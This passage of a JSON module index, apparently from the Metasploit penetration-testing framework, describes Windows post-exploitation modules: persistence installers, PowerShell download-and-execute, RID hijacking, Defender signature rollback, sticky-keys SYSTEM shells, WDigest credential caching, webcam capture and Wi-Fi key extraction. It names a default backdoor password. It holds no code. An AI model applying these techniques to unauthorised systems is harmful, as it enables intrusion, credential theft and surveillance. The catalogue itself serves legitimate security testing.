"post_windows/manage/persistence_exe": {
"name": "Windows Manage Persistent EXE Payload Installer",
"full_name": "post/windows/manage/persistence_exe",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Merlyn drforbin Cousins <drforbin6@gmail.com>"
],
"description": "This Module will upload an executable to a remote host and make it Persistent.\n It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login,\n SYSTEM will start on system boot but requires privs. SERVICE will create a new service\n which will start the payload. Again requires privs.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-26 17:46:18 +0000",
"path": "/modules/post/windows/manage/persistence_exe.rb",
"is_install_path": true,
"ref_name": "windows/manage/persistence_exe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/portproxy": {
"name": "Windows Manage Set Port Forwarding With PortProxy",
"full_name": "post/windows/manage/portproxy",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module uses the PortProxy interface from netsh to set up\n port forwarding persistently (even after reboot). PortProxy\n supports TCP IPv4 and IPv6 connections.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/portproxy.rb",
"is_install_path": true,
"ref_name": "windows/manage/portproxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/powershell/build_net_code": {
"name": "Powershell .NET Compiler",
"full_name": "post/windows/manage/powershell/build_net_code",
"rank": 600,
"disclosure_date": "2012-08-14",
"type": "post",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module will build a .NET source file using powershell. The compiler builds\n the executable or library in memory and produces a binary. After compilation the\n PowerShell session can also sign the executable if provided a path the\n a .pfx formatted certificate. Compiler options and a list of assemblies\n required can be configured in the datastore.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-27 07:41:06 +0000",
"path": "/modules/post/windows/manage/powershell/build_net_code.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/build_net_code",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/powershell/exec_powershell": {
"name": "Windows Manage PowerShell Download and/or Execute",
"full_name": "post/windows/manage/powershell/exec_powershell",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
"RageLtMan"
],
"description": "This module will download and execute a PowerShell script over a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/exec_powershell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/powershell/load_script": {
"name": "Load Scripts Into PowerShell Session",
"full_name": "post/windows/manage/powershell/load_script",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Turner benpturner <Ben Turner benpturner@yahoo.com>",
"Dave Hardy davehardy20 <Dave Hardy davehardy20@gmail.com>"
],
"description": "This module will download and execute one or more PowerShell script\n s over a present powershell session.\n Setting VERBOSE to true will show the stager results.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/powershell/load_script.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/load_script",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/pptp_tunnel": {
"name": "Windows Manage Remote Point-to-Point Tunneling Protocol",
"full_name": "post/windows/manage/pptp_tunnel",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n the tunnel is created we can use it to force the victim traffic to go through the\n server getting a man in the middle attack. Be sure to allow forwarding and\n masquerading on the VPN server (mitm).",
"references": [
"URL-http://www.youtube.com/watch?v=vdppEZjMPCM&hd=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/pptp_tunnel.rb",
"is_install_path": true,
"ref_name": "windows/manage/pptp_tunnel",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/priv_migrate": {
"name": "Windows Manage Privilege Based Process Migration ",
"full_name": "post/windows/manage/priv_migrate",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Josh Hale \"sn0wfa11\" <jhale85446@gmail.com>",
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will migrate a Meterpreter session based on session privileges.\n It will do everything it can to migrate, including spawning a new User level process.\n For sessions with Admin rights: It will try to migrate into a System level process in the following\n order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe.\n If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights:\n It will try to migrate to a user level process, if that fails it will attempt to spawn the process\n then migrate to it. It will attempt the User level processes in the following order:\n NAME (if specified), explorer.exe, then notepad.exe.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/priv_migrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/priv_migrate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/pxeexploit": {
"name": "Windows Manage PXE Exploit Server",
"full_name": "post/windows/manage/pxeexploit",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"scriptjunkie"
],
"description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing a payload to install metsvc, disable the\n firewall, and add a new user metasploit on any Windows partition seen,\n and add a uid 0 user with username and password metasploit to any linux\n partition seen. The windows user will have the password p@SSw0rd!123456\n (in case of complexity requirements) and will be added to the administrators\n group.\n\n See exploit/windows/misc/pxesploit for a version to deliver a specific payload.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/pxeexploit.rb",
"is_install_path": true,
"ref_name": "windows/manage/pxeexploit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/reflective_dll_inject": {
"name": "Windows Manage Reflective DLL Injection Module",
"full_name": "post/windows/manage/reflective_dll_inject",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will inject into the memory of a process a specified Reflective DLL.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/reflective_dll_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/reflective_dll_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/remove_ca": {
"name": "Windows Manage Certificate Authority Removal",
"full_name": "post/windows/manage/remove_ca",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module allows the attacker to remove an arbitrary CA certificate\n from the victim's Trusted Root store.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/remove_ca.rb",
"is_install_path": true,
"ref_name": "windows/manage/remove_ca",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/remove_host": {
"name": "Windows Manage Host File Entry Removal",
"full_name": "post/windows/manage/remove_host",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module allows the attacker to remove an entry from the Windows hosts file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/remove_host.rb",
"is_install_path": true,
"ref_name": "windows/manage/remove_host",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/rid_hijack": {
"name": "Windows Manage RID Hijacking",
"full_name": "post/windows/manage/rid_hijack",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sebastian Castro <sebastian.castro@cslcolombia.com>"
],
"description": "This module will create an entry on the target by modifying some properties\n of an existing account. It will change the account attributes by setting a\n Relative Identifier (RID), which should be owned by one existing\n account on the destination machine.\n\n Taking advantage of some Windows Local Users Management integrity issues,\n this module will allow to authenticate with one known account\n credentials (like GUEST account), and access with the privileges of another\n existing account (like ADMINISTRATOR account), even if the spoofed account is\n disabled.",
"references": [
"URL-http://csl.com.co/rid-hijacking/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-04-03 04:57:41 +0000",
"path": "/modules/post/windows/manage/rid_hijack.rb",
"is_install_path": true,
"ref_name": "windows/manage/rid_hijack",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/rollback_defender_signatures": {
"name": "Disable Windows Defender Signatures",
"full_name": "post/windows/manage/rollback_defender_signatures",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"metasploit <metasploit@@csiete.org>",
"luisco100 <luisco100@gmail.com>"
],
"description": "This module with appropriate rights let to use the Windows Defender command-line utility a run and automation\n tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.\n The tool is prominently used for scheduling scans and updating the signature or definition files,\n but there is a switch created to restore the installed signature definitions to a previous backup copy or\n to the original default set of signatures which is none, disabling all the signatures and allowing malware\n to execute even with the Windows Defender solution enabled.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-30 16:41:40 +0000",
"path": "/modules/post/windows/manage/rollback_defender_signatures.rb",
"is_install_path": true,
"ref_name": "windows/manage/rollback_defender_signatures",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/rpcapd_start": {
"name": "Windows Manage Remote Packet Capture Service Starter",
"full_name": "post/windows/manage/rpcapd_start",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module enables the Remote Packet Capture System (rpcapd service)\n included in the default installation of Winpcap. The module allows you to set up\n the service in passive or active mode (useful if the client is behind a firewall).\n If authentication is enabled you need a local user account to capture traffic.\n PORT will be used depending of the mode configured.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/rpcapd_start.rb",
"is_install_path": true,
"ref_name": "windows/manage/rpcapd_start",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/run_as": {
"name": "Windows Manage Run Command As User",
"full_name": "post/windows/manage/run_as",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kx499"
],
"description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default, by setting\n CMDOUT to true output will be redirected to a temp file and read back in to\n display. By setting advanced option SETPASS to true, it will reset the users\n password and then execute the command.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-04-09 15:27:50 +0000",
"path": "/modules/post/windows/manage/run_as.rb",
"is_install_path": true,
"ref_name": "windows/manage/run_as",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/run_as_psh": {
"name": "Windows 'Run As' Using Powershell",
"full_name": "post/windows/manage/run_as_psh",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"p3nt4"
],
"description": "This module will start a process as another user using powershell.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/run_as_psh.rb",
"is_install_path": true,
"ref_name": "windows/manage/run_as_psh",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/sdel": {
"name": "Windows Manage Safe Delete",
"full_name": "post/windows/manage/sdel",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "The goal of the module is to hinder the recovery of deleted files by overwriting\n its contents. This could be useful when you need to download some file on the victim\n machine and then delete it without leaving clues about its contents. Note that the script\n does not wipe the free disk space so temporary/sparse/encrypted/compressed files could\n not be overwritten. Note too that MTF entries are not overwritten so very small files\n could stay resident within the stream descriptor.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/sdel.rb",
"is_install_path": true,
"ref_name": "windows/manage/sdel",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/sticky_keys": {
"name": "Sticky Keys Persistance Module",
"full_name": "post/windows/manage/sticky_keys",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"OJ Reeves"
],
"description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\n for certain executables.\n\n The module options allow for this hack to be applied to:\n\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n The hack can be added using the ADD action, and removed with the REMOVE action.\n\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n to the target prior to running the module. By default, a SYSTEM command prompt is installed\n using the registry method if this module is run without modifying any parameters.",
"references": [
"URL-https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit",
"URL-http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/sticky_keys.rb",
"is_install_path": true,
"ref_name": "windows/manage/sticky_keys",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vmdk_mount": {
"name": "Windows Manage VMDK Mount Drive",
"full_name": "post/windows/manage/vmdk_mount",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage\n of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the\n device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with\n extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots\n or clones are linked from the file.",
"references": [
"URL-http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vmdk_mount.rb",
"is_install_path": true,
"ref_name": "windows/manage/vmdk_mount",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_create": {
"name": "Windows Manage Create Shadow Copy",
"full_name": "post/windows/manage/vss_create",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to create a new volume shadow copy.\n This is based on the VSSOwn Script originally posted by\n Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vss_create.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_create",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_list": {
"name": "Windows Manage List Shadow Copies",
"full_name": "post/windows/manage/vss_list",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to list any Volume Shadow Copies\n on the system. This is based on the VSSOwn Script\n originally posted by Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vss_list.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_mount": {
"name": "Windows Manage Mount Shadow Copy",
"full_name": "post/windows/manage/vss_mount",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to mount a Volume Shadow Copy\n on the system. This is based on the VSSOwn Script\n originally posted by Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vss_mount.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_mount",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_set_storage": {
"name": "Windows Manage Set Shadow Copy Storage Space",
"full_name": "post/windows/manage/vss_set_storage",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to change the amount of space\n for volume shadow copy storage. This is based on the\n VSSOwn Script originally posted by Tim Tomes and\n Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/vss_set_storage.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_set_storage",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_storage": {
"name": "Windows Manage Get Shadow Copy Storage Info",
"full_name": "post/windows/manage/vss_storage",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to get volume shadow copy storage info.\n This is based on the VSSOwn Script originally posted by\n Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vss_storage.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_storage",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/wdigest_caching": {
"name": "Windows Post Manage WDigest Credential Caching",
"full_name": "post/windows/manage/wdigest_caching",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kostas Lintovois <kostas.lintovois@mwrinfosecurity.com>"
],
"description": "On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables\n credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.\n Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/wdigest_caching.rb",
"is_install_path": true,
"ref_name": "windows/manage/wdigest_caching",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/webcam": {
"name": "Windows Manage Webcam",
"full_name": "post/windows/manage/webcam",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will allow the user to detect installed webcams (with\n the LIST action) or take a snapshot (with the SNAPSHOT) action.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/webcam.rb",
"is_install_path": true,
"ref_name": "windows/manage/webcam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/recon/computer_browser_discovery": {
"name": "Windows Recon Computer Browser Discovery",
"full_name": "post/windows/recon/computer_browser_discovery",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module uses railgun to discover hostnames and IPs on the network.\n LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers),\n SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers),\n NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers),\n WINDOWS (all Windows hosts), or UNIX (all Unix hosts).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/recon/computer_browser_discovery.rb",
"is_install_path": true,
"ref_name": "windows/recon/computer_browser_discovery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/recon/outbound_ports": {
"name": "Windows Outbound-Filtering Rules",
"full_name": "post/windows/recon/outbound_ports",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module makes some kind of TCP traceroute to get outbound-filtering rules.\n It will try to make a TCP connection to a certain public IP address (this IP\n does not need to be under your control) using different TTL incremental values.\n This way if you get an answer (ICMP TTL time exceeded packet) from a public IP\n device you can infer that the destination port is allowed. Setting STOP to\n true the module will stop as soon as you reach a public IP (this will generate\n less noise in the network).",
"references": [
"URL-http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/recon/outbound_ports.rb",
"is_install_path": true,
"ref_name": "windows/recon/outbound_ports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/recon/resolve_ip": {
"name": "Windows Recon Resolve IP",
"full_name": "post/windows/recon/resolve_ip",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module reverse resolves a range or IP to a hostname",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/recon/resolve_ip.rb",
"is_install_path": true,
"ref_name": "windows/recon/resolve_ip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_bss_list": {
"name": "Windows Gather Wireless BSS Info",
"full_name": "post/windows/wlan/wlan_bss_list",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module gathers information about the wireless Basic Service Sets\n available to the victim machine.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/wlan/wlan_bss_list.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_bss_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_current_connection": {
"name": "Windows Gather Wireless Current Connection Info",
"full_name": "post/windows/wlan/wlan_current_connection",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module gathers information about the current connection on each\n wireless lan interface on the target machine.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/wlan/wlan_current_connection.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_current_connection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_disconnect": {
"name": "Windows Disconnect Wireless Connection",
"full_name": "post/windows/wlan/wlan_disconnect",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module disconnects the current wireless network connection\n on the specified interface.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/wlan/wlan_disconnect.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_disconnect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_probe_request": {
"name": "Windows Send Probe Request Packets",
"full_name": "post/windows/wlan/wlan_probe_request",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module send probe requests through the wlan interface.\n The ESSID field will be use to set a custom message.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-03 11:41:09 +0000",
"path": "/modules/post/windows/wlan/wlan_probe_request.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_probe_request",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_profile": {
"name": "Windows Gather Wireless Profile",
"full_name": "post/windows/wlan/wlan_profile",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts saved Wireless LAN profiles. It will also try to decrypt\n the network key material. Behavior is slightly different between OS versions\n when it comes to WPA. In Windows Vista/7 we will get the passphrase. In\n Windows XP we will get the PBKDF2 derived key.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/wlan/wlan_profile.rb",
"is_install_path": true,
"ref_name": "windows/wlan/wlan_profile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
}
}
Reference in New Issue View Git Blame Copy Permalink